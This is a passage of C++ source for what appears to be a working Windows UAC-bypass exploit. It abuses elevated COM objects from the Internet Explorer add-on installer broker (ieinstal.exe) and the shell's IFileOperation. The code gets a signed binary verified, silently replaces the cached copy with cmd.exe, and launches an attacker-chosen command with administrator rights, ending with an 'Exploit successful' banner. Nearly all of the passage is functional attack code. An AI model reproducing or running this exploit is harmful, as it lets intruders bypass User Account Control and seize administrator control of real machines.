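    // our side that call, and therefore VerifyFile, fails.
    hr = CoInitializeSecurity(nullptr, -1, nullptr, nullptr, RPC_C_AUTHN_LEVEL_CONNECT, RPC_C_IMP_LEVEL_IMPERSONATE,
        nullptr, 0, nullptr);
    if (FAILED(hr))
    {
        std::wcout << L"CoInitializeSecurity() failed. HRESULT: 0x" << std::hex << hr << std::endl;
        CoUninitialize();
        return EXIT_FAILURE;
    }

    IFileOperation* fileOperation;
    IIEAdminBrokerObjectForAdminInstaller* adminInstaller;
    BIND_OPTS3 bindOptions{};

    bindOptions.dwClassContext = CLSCTX_LOCAL_SERVER;
    bindOptions.cbStruct = sizeof BIND_OPTS3;

    // Elevated shell FileOperation object; used later to swap the file inside the broker's installer cache.
    hr = CoGetObject(L"Elevation:Administrator!new:{3AD05575-8857-4850-9277-11B85BDB8E09}", &bindOptions,
        IID_IFileOperation,
        reinterpret_cast<void**>(&fileOperation));
    if (FAILED(hr))
    {
        CoUninitialize();
        std::wcout << L"CoGetObject() (0) failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }
    // Elevated IeAxiAdminInstaller from the Internet Explorer add-on installer coclass (hosted by ieinstal.exe).
    hr = CoGetObject(L"Elevation:Administrator!new:{BDB57FF2-79B9-4205-9447-F5FE85F37312}", &bindOptions,
        IID_IeAxiAdminInstaller,
        reinterpret_cast<void**>(&adminInstaller));
    if (FAILED(hr))
    {
        fileOperation->Release();
        CoUninitialize();
        std::wcout << L"CoGetObject() (1) failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }

    // Silent, elevated file operations: no confirmation dialogs, no copy hooks, no error UI.
    hr = fileOperation->
        SetOperationFlags(FOF_NOCONFIRMATION | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION | FOF_NOERRORUI);
    if (FAILED(hr))
    {
        adminInstaller->Release();
        fileOperation->Release();
        CoUninitialize();
        std::wcout << L"IFileOperation::SetOperationFlags() failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }

    // A signed Windows binary whose embedded signature satisfies the WinVerifyTrust call inside VerifyFile.
    const std::wstring signedFile = system32Dir + L"\\bdeunlock.exe";

    /*
     * Begin ieinstal.exe -> CIEAdminBrokerObject::CActiveXInstallBroker
     */

    BSTR instanceUuid;

    hr = adminInstaller->InitializeAdminInstaller(nullptr, 0, &instanceUuid);
    if (FAILED(hr))
    {
        adminInstaller->Release();
        fileOperation->Release();
        CoUninitialize();
        std::wcout << L"ieinstal.exe -> CIEAdminBrokerObject::InitializeAdminInstaller() failed. HRESULT: 0x" <<
            std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }

    IIEAdminBrokerObjectForInstaller2* installer2;

    // IeAxiInstaller2 is a second interface on the same broker object.
    hr = adminInstaller->QueryInterface(IID_IeAxiInstaller2, reinterpret_cast<void**>(&installer2));
    if (FAILED(hr))
    {
        SysFreeString(instanceUuid);
        adminInstaller->Release();
        fileOperation->Release();
        CoUninitialize();
        std::wcout << L"ieinstal.exe -> CIEAdminBrokerObject::QueryInterface() failed. HRESULT: 0x" <<
            std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }

    auto* const fileName = SysAllocString(signedFile.c_str());
    BSTR targetFile;       // path of the verified copy inside the installer cache (owned: SysFreeString)
    ULONG unknown5;        // per UACME: size of the certificate-details blob below
    PUCHAR unknown6;       // per UACME: certificate details (owned: CoTaskMemFree); not used here

    /*
     * HWND is INVALID_HANDLE_VALUE: see documentation of WinVerifyTrust (no parent window / no UI).
     */
    hr = installer2->VerifyFile(instanceUuid, static_cast<HWND>(INVALID_HANDLE_VALUE), fileName, fileName, nullptr,
        WTD_UI_NONE, WTD_UICONTEXT_EXECUTE, IID_IUnknown, &targetFile, &unknown5, &unknown6);
    SysFreeString(fileName);
    if (FAILED(hr))
    {
        SysFreeString(instanceUuid);
        installer2->Release();
        adminInstaller->Release();
        fileOperation->Release();
        CoUninitialize();
        std::wcout << L"ieinstal.exe -> CIEAdminBrokerObject::VerifyFile() failed. HRESULT: 0x" <<
            std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }
    CoTaskMemFree(unknown6);

    /*
     * Replace the file in the installer cache with cmd.exe: stage a copy of cmd.exe in the current directory under
     * the cached file's exact name, then use the elevated IFileOperation to delete the cached file and move the
     * staged copy into its place. RunSetupCommand only accepts the path VerifyFile returned, so the name must match.
     */

    // Buffers sized for the CRT's own limits. The extension is dropped by the split and re-added as ".exe"
    // (assumes the cached copy keeps bdeunlock.exe's extension — TODO confirm). Both results are checked;
    // the previous 25-WCHAR name buffer with ignored return values would fault on a longer cache file name.
    WCHAR file[_MAX_FNAME], directory[_MAX_DIR], drive[_MAX_DRIVE];

    const bool splitOk =
        _wsplitpath_s(targetFile, drive, sizeof drive / sizeof(WCHAR), directory, sizeof directory / sizeof(WCHAR), file,
            sizeof file / sizeof(WCHAR), nullptr, 0) == 0 &&
        wcscat_s(file, sizeof file / sizeof(WCHAR), L".exe") == 0;
    if (!splitOk)
    {
        SysFreeString(targetFile);
        SysFreeString(instanceUuid);
        installer2->Release();
        adminInstaller->Release();
        fileOperation->Release();
        CoUninitialize();
        std::wcout << L"_wsplitpath_s() failed on the cached file path.\n";
        return EXIT_FAILURE;
    }
    // Installer cache directory (drive + directory, trailing backslash retained); the MoveItem destination.
    const std::wstring cacheDirectory = std::wstring{ drive } + directory;
    const std::wstring cmdPath = system32Dir + L"\\cmd.exe";

    // Staged copy in the current directory, named exactly like the cached file.
    if (!CopyFileW(cmdPath.c_str(), file, FALSE))
    {
        std::wcout << L"CopyFileW() failed. Error: " << GetLastError() << std::endl;
        SysFreeString(targetFile);
        SysFreeString(instanceUuid);
        installer2->Release();
        adminInstaller->Release();
        fileOperation->Release();
        CoUninitialize();
        return EXIT_FAILURE;
    }

    // Absolute path of the staged copy (std::wstring replaces the previous raw new[]/delete[] pair).
    std::wstring stagedPath;
    const DWORD cwdSize = GetCurrentDirectoryW(0, nullptr);  // required size including the terminator
    if (cwdSize != 0)
    {
        stagedPath.resize(cwdSize);
        const DWORD cwdLength = GetCurrentDirectoryW(cwdSize, &stagedPath[0]);
        stagedPath.resize(cwdLength < cwdSize ? cwdLength : 0);
    }
    if (stagedPath.empty())
    {
        DeleteFileW(file);
        SysFreeString(targetFile);
        SysFreeString(instanceUuid);
        installer2->Release();
        adminInstaller->Release();
        fileOperation->Release();
        CoUninitialize();
        std::wcout << L"GetCurrentDirectoryW() failed.\n";
        return EXIT_FAILURE;
    }
    stagedPath += L'\\';
    stagedPath += file;

    IShellItem* existingItem, * parentFolder, * newItem;

    hr = SHCreateItemFromParsingName(stagedPath.c_str(), nullptr, IID_IShellItem, reinterpret_cast<void**>(&newItem));
    if (FAILED(hr))
    {
        DeleteFileW(file);
        SysFreeString(targetFile);
        SysFreeString(instanceUuid);
        installer2->Release();
        adminInstaller->Release();
        fileOperation->Release();
        CoUninitialize();
        std::wcout << L"SHCreateItemFromParsingName() (0) failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }
    hr = SHCreateItemFromParsingName(targetFile, nullptr, IID_IShellItem, reinterpret_cast<void**>(&existingItem));
    if (FAILED(hr))
    {
        newItem->Release();
        DeleteFileW(file);
        SysFreeString(targetFile);
        SysFreeString(instanceUuid);
        installer2->Release();
        adminInstaller->Release();
        fileOperation->Release();
        CoUninitialize();
        std::wcout << L"SHCreateItemFromParsingName() (1) failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }
    hr = SHCreateItemFromParsingName(cacheDirectory.c_str(), nullptr, IID_IShellItem, reinterpret_cast<void**>(&parentFolder));
    if (FAILED(hr))
    {
        existingItem->Release();
        newItem->Release();
        DeleteFileW(file);
        SysFreeString(targetFile);
        SysFreeString(instanceUuid);
        installer2->Release();
        adminInstaller->Release();
        fileOperation->Release();
        CoUninitialize();
        std::wcout << L"SHCreateItemFromParsingName() (2) failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }

    // Queue: delete the verified copy, then move the staged cmd.exe into the cache under the same name.
    hr = fileOperation->DeleteItem(existingItem, nullptr);
    if (FAILED(hr))
    {
        parentFolder->Release();
        existingItem->Release();
        newItem->Release();
        DeleteFileW(file);
        SysFreeString(targetFile);
        SysFreeString(instanceUuid);
        installer2->Release();
        adminInstaller->Release();
        fileOperation->Release();
        CoUninitialize();
        std::wcout << L"IFileOperation::DeleteItem() failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }
    hr = fileOperation->MoveItem(newItem, parentFolder, nullptr, nullptr);
    if (FAILED(hr))
    {
        parentFolder->Release();
        existingItem->Release();
        newItem->Release();
        DeleteFileW(file);
        SysFreeString(targetFile);
        SysFreeString(instanceUuid);
        installer2->Release();
        adminInstaller->Release();
        fileOperation->Release();
        CoUninitialize();
        std::wcout << L"IFileOperation::MoveItem() failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }
    // Executes both queued operations in the elevated FileOperation server.
    hr = fileOperation->PerformOperations();
    parentFolder->Release();
    existingItem->Release();
    newItem->Release();
    fileOperation->Release();
    DeleteFileW(file);  // no-op after a successful move; otherwise removes the staged copy
    if (FAILED(hr))
    {
        SysFreeString(targetFile);
        SysFreeString(instanceUuid);
        installer2->Release();
        adminInstaller->Release();
        CoUninitialize();
        std::wcout << L"IFileOperation::PerformOperations() failed. HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }

    auto* const workingDirectory = SysAllocString(system32Dir.c_str());

    /*
     * Launch as "<cached cmd.exe> /C <arg>": the cached copy has none of cmd.exe's language resources next to it,
     * so it is used only to spawn the real command (a direct interactive use produces garbled/error messages).
     */
    std::wstring commandLine{ targetFile };
    commandLine += L" /C ";
    const bstr_t wideArg(arg);  // ANSI -> UTF-16 via the current code page
    if (static_cast<const wchar_t*>(wideArg) != nullptr)
        commandLine += static_cast<const wchar_t*>(wideArg);
    SysFreeString(targetFile);
    auto* const commandLineBstr = SysAllocString(commandLine.c_str());

    HANDLE exeHandle = nullptr;
    /*
     * 'infSection' and 'title' are not used in our case, because flags are 0: we are doing a direct launch of the
     * installer process. However, ieinstal.exe faults if they are NULL, so pass empty literals; they show up as
     * L'\0' on the other side anyway (they are not SysAlloc'ed() strings).
     */
    hr = installer2->RunSetupCommand(instanceUuid, nullptr, commandLineBstr, const_cast<BSTR>(L""), workingDirectory,
        const_cast<BSTR>(L""), 0, &exeHandle);
    SysFreeString(workingDirectory);
    SysFreeString(commandLineBstr);
    SysFreeString(instanceUuid);
    installer2->Release();
    adminInstaller->Release();
    CoUninitialize();

    /*
     * End ieinstal.exe -> CIEAdminBrokerObject::CActiveXInstallBroker
     */

    // E_INVALIDARG is the value seen on a successful launch (see the interface documentation). Anything else is a
    // failure and is now reported as one instead of falling through to the success banner.
    if (hr != E_INVALIDARG)
    {
        std::wcout <<
            L"ieinstal.exe -> CIEAdminBrokerObject::RunSetupCommand() did not return the expected value (E_INVALIDARG)."
            L" HRESULT: 0x" << std::hex << hr << std::endl;
        return EXIT_FAILURE;
    }

    SetConsoleTextAttribute(hStdOutput, 14);
    std::wcout << L"[";
    SetConsoleTextAttribute(hStdOutput, 15);
    std::wcout << L"@";
    SetConsoleTextAttribute(hStdOutput, 14);
    std::wcout << L"] ";
    SetConsoleTextAttribute(hStdOutput, 14);
    std::wcout << L"*** Exploit successful.\n\n";
    SetConsoleTextAttribute(hStdOutput, 7);

    return 0;
}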